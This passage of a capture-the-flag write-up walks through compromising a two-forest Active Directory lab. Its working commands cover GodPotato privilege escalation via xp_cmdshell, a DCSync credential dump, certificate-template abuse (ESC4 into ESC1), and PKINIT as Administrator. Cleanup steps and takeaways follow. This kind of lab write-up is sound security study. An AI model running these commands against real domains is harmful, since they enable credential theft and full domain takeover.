GodPotato abuses RPCSS via a named pipe (not the patched DCOM marshalling path), which is why it still works on patched 2022.

Setup

From the c.carlssen WinRM session, upload GodPotato to a world-readable path:

upload /path/to/GodPotato-NET4.exe C:\Windows\Tasks\GP.exe
# Make it readable by svc_sql
icacls C:\Windows\Tasks\GP.exe /grant Everyone:RX

Execute via xp_cmdshell

EXEC xp_cmdshell 'C:\Windows\Tasks\GP.exe -cmd "net localgroup Administrators C.Carlssen /add"';

Output:

[*] Find System Token : True
[*] CurrentUser: NT AUTHORITY\SYSTEM
The command completed successfully.

c.carlssen is now in BUILTIN\Administrators on DC2. Since DC2 is a Domain Controller, this is effectively pong.htb Domain Admin equivalent.


8. DCSync → R.Martinelli

With c.carlssen now in Administrators on DC2, DCSync works:

export KRB5CCNAME=$(pwd)/carlssen.ccache

proxychains impacket-secretsdump \
  -k -no-pass \
  'pong.htb/c.carlssen@dc2.pong.htb' \
  -dc-ip 192.168.2.2 \
  -target-ip 192.168.2.2 \
  -just-dc-user r.martinelli

⚠️ Use -just-dc-user (single-user dump). A full DRSUAPI dump over SOCKS frequently throws KRB_AP_ERR_MODIFIED due to SPN validation policy differences over the proxied connection. Single-user dump reliably works.

This yields R.Martinelli’s NT hash and AES256 key.

Why R.Martinelli? BloodHound shows R.Martinelli is a pong.htb principal that holds CA Manager rights on ping-DC1-CA via a cross-domain ACL. This was confirmed earlier:

# From DC1 shell earlier
$sid = New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-2410575906-3092493790-2123333151-1124")
$sid.Translate([System.Security.Principal.NTAccount])
# → pong\R.Martinelli

R.Martinelli is the member of PING\CA Managers (alongside M.Wallace and P.Paul), granting write rights over certificate templates on ping-DC1-CA.

Get TGT (using PING’s KDC since R.Martinelli is authenticating to PING’s CA):

impacket-getTGT pong.htb/r.martinelli \
  -aesKey <MARTINELLI_AES256> \
  -dc-ip 192.168.2.2
mv r.martinelli.ccache martinelli.ccache
export KRB5CCNAME=$(pwd)/martinelli.ccache

9. ESC4 - Write Rights on SmartcardAuthentication Template

ESC4 = a principal has dangerous write rights (WriteDACL, WriteOwner, WriteProperty, GenericWrite, or GenericAll) on a certificate template. This allows modifying the template to introduce ESC1 conditions.

R.Martinelli ∈ CA Managers (ping.htb) → Write rights on templates published from ping-DC1-CA.

Backup the Template First

# Pre-fetch a cross-realm TGS so certipy can reach PING's LDAP
KRB5CCNAME=martinelli.ccache kvno ldap/dc1.ping.htb -u r.martinelli@pong.htb

certipy template -k -no-pass \
  -u 'r.martinelli@pong.htb' \
  -target dc1.ping.htb \
  -dc-ip 10.129.43.213 \
  -template SmartcardAuthentication \
  -save-configuration sc_backup.json

Overwrite Template to Enable ESC1

certipy template -k -no-pass \
  -u 'R.martinelli@pong.htb' \
  -target dc1.ping.htb \
  -dc-ip 10.129.43.213 \
  -template SmartcardAuthentication \
  -write-default-configuration \
  -force

-write-default-configuration sets:

AttributeNew ValueEffect
nTSecurityDescriptorAuthenticated Users → Full ControlAny user can enroll
msPKI-Certificate-Name-Flag0x1 (ENROLLEE_SUPPLIES_SUBJECT)Requester controls the SAN
msPKI-Enrollment-Flag0No manager approval required
pKIExtendedKeyUsage1.3.6.1.5.5.7.3.2 (Client Authentication)Certificate can be used for PKINIT

This is now a textbook ESC1 template.


10. ESC1 → Administrator@ping.htb → root.txt

What ESC1 Is

ESC1 combines:

  1. Enrollee controls the SAN (ENROLLEE_SUPPLIES_SUBJECT flag)
  2. Client Authentication EKU present
  3. Low-privileged users can enroll

An attacker can request a certificate specifying any UPN (e.g., Administrator@ping.htb) in the Subject Alternative Name, then use that certificate for PKINIT to obtain a TGT as that user.

Patched DC Requirement: SID Extension

Since the KB5014754 patch and StrongCertificateBindingEnforcement, DCs in Full Enforcement mode require the certificate to contain the target account’s Object SID in the szOID_NTDS_CA_SECURITY_EXT extension. Without it, authentication fails with KDC_ERR_CLIENT_NAME_MISMATCH.

Get the Administrator SID:

# From DC1 shell
(Get-ADUser Administrator).SID.Value
# → S-1-5-21-750635624-2058721901-1932338391-500

Enroll

Switch back to c.roberts (any Authenticated User qualifies now):

export KRB5CCNAME=$(pwd)/c.roberts.ccache

certipy req -k -no-pass \
  -target dc1.ping.htb \
  -dc-ip 10.129.43.213 \
  -ca ping-DC1-CA \
  -template SmartcardAuthentication \
  -upn 'Administrator@ping.htb' \
  -sid 'S-1-5-21-750635624-2058721901-1932338391-500'

Output:

[*] Got certificate with UPN 'Administrator@ping.htb'
[*] Saved certificate and private key to 'administrator.pfx'

PKINIT as Administrator

certipy auth -pfx administrator.pfx -domain ping.htb -username Administrator -dc-ip 10.129.43.213

Output:

[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Got hash for 'administrator@ping.htb': aad3b435b51404eeaad3b435b51404ee:<REDACTED>

Get Shell and root.txt

export KRB5CCNAME=$(pwd)/administrator.ccache
evil-winrm -i dc1.ping.htb -r PING.HTB

root-shell

type C:\Users\Administrator\Desktop\root.txt
# → <REDACTED ROOT FLAG>

🏁 root.txt obtained

thankyou

Cleanup

Always restore what you modified (especially on HTB - other players share the box):

# 1. Restore SmartcardAuthentication template
certipy template -k -no-pass \
  -u 'r.martinelli@pong.htb' \
  -target dc1.ping.htb -dc-ip 10.129.43.213 \
  -template SmartcardAuthentication \
  -write-configuration sc_backup.json -force

# 2. Remove RBCD from svc_sql
# From c.carlssen WinRM session on DC2:
# $svc.Properties['msDS-AllowedToActOnBehalfOfOtherIdentity'].Clear()
# $svc.CommitChanges()

# 3. Remove c.carlssen from DC2 Administrators
# EXEC xp_cmdshell 'net localgroup Administrators C.Carlssen /delete'

# 4. Restore gMSA Managers group type to Global (-2147483646)
proxychains ~/venv/bin/bloodyAD \
  --host dc2.pong.htb -d pong.htb -k --dc-ip 192.168.2.2 \
  set object 'CN=gMSA Managers,CN=Users,DC=pong,DC=htb' \
  groupType -v -2147483646

# 5. Remove c.roberts from gMSA Managers and drop the GenericAll ACE

# 6. Remove dropped files
# rm C:\Windows\Tasks\GP.exe
# rm C:\Windows\Temp\chisel.exe
# Disable xp_cmdshell: EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;

Key Takeaways

1. ESC13 is stealthier than ESC1

There is nothing wrong with the template’s flags, EKU, or DACL in isolation. The vulnerability lives in the msDS-OIDToGroupLink attribute on the OID object - a separate AD object that standard template auditing never checks.

2. groupType is a write attribute

If you have WriteDACL on a group, you can flip its scope (Global → Universal → DomainLocal). This changes which principals the group can contain - enabling FSP insertion from trusted domains.

3. gMSA AES keys use dnsHostName in the salt

The Kerberos string-to-key salt for gMSAs is REALM + "host" + samaccountname_without_dollar + "." + dnshostname_suffix. Getting this wrong causes PREAUTH_FAILED. Always verify the exact dnsHostName attribute before deriving keys.

4. JEA RunAsVirtualAccount ≠ secure isolation

RunAsVirtualAccount = $true runs the session as a local admin. Even with NoLanguage and restricted cmdlets, the underlying process context has elevated rights. File system objects readable by SYSTEM are readable by the session.

5. RBCD only needs GenericWrite on the target

You do not need WriteAccountRestrictions (a specific attribute permission). GenericWrite includes write to msDS-AllowedToActOnBehalfOfOtherIdentity implicitly.

6. GodPotato still works on Server 2022

The DCOM-based potato techniques were patched. GodPotato uses the RPCSS named pipe path which was not patched. SeImpersonatePrivilege → SYSTEM is still reliable on 2022.

7. MIT krb5 hostname canonicalization

/etc/hosts first-name-wins. The canonical name on the line determines the SPN that GSSAPI constructs. Always put the FQDN first.

8. PKINIT requires SID extension on patched DCs

Since KB5014754, -sid is mandatory in certipy req when targeting patched DCs in Full Enforcement mode. Omitting it results in KDC_ERR_CLIENT_NAME_MISMATCH.

9. CA Managers across a forest trust

R.Martinelli is a pong.htb user with CA Manager rights on ping.htb’s CA. This is a cross-domain ACE that BloodHound’s ForeignGroupMembership edge highlights. In real engagements, these cross-domain CA permissions are often overlooked.


Tools Used

ToolVersionPurpose
certipy-ad5.0.4ADCS enumeration and exploitation (ESC13, ESC4, ESC1, PKINIT)
impacket0.12.0getTGT, getST, secretsdump, mssqlclient
NetExec (nxc)latestSMB/LDAP enumeration, gMSA, ADCS modules
Evil-WinRM3.9WinRM interactive shell
bloodyADlatestLDAP writes (DACL, groupType, groupMember, RBCD)
chisel1.10.1Reverse SOCKS5 tunnel through DC1 to reach 192.168.2.2
pypsrplatestPython WinRM client - required for named PSSession configuration
GodPotatoNET4SeImpersonatePrivilege → SYSTEM on Server 2022
SharpHound / bloodhound-pythonlatestAD graph collection
proxychains4.17Traffic routing through SOCKS5 tunnel

Pwned by havoc@havocsec - HTB Season 10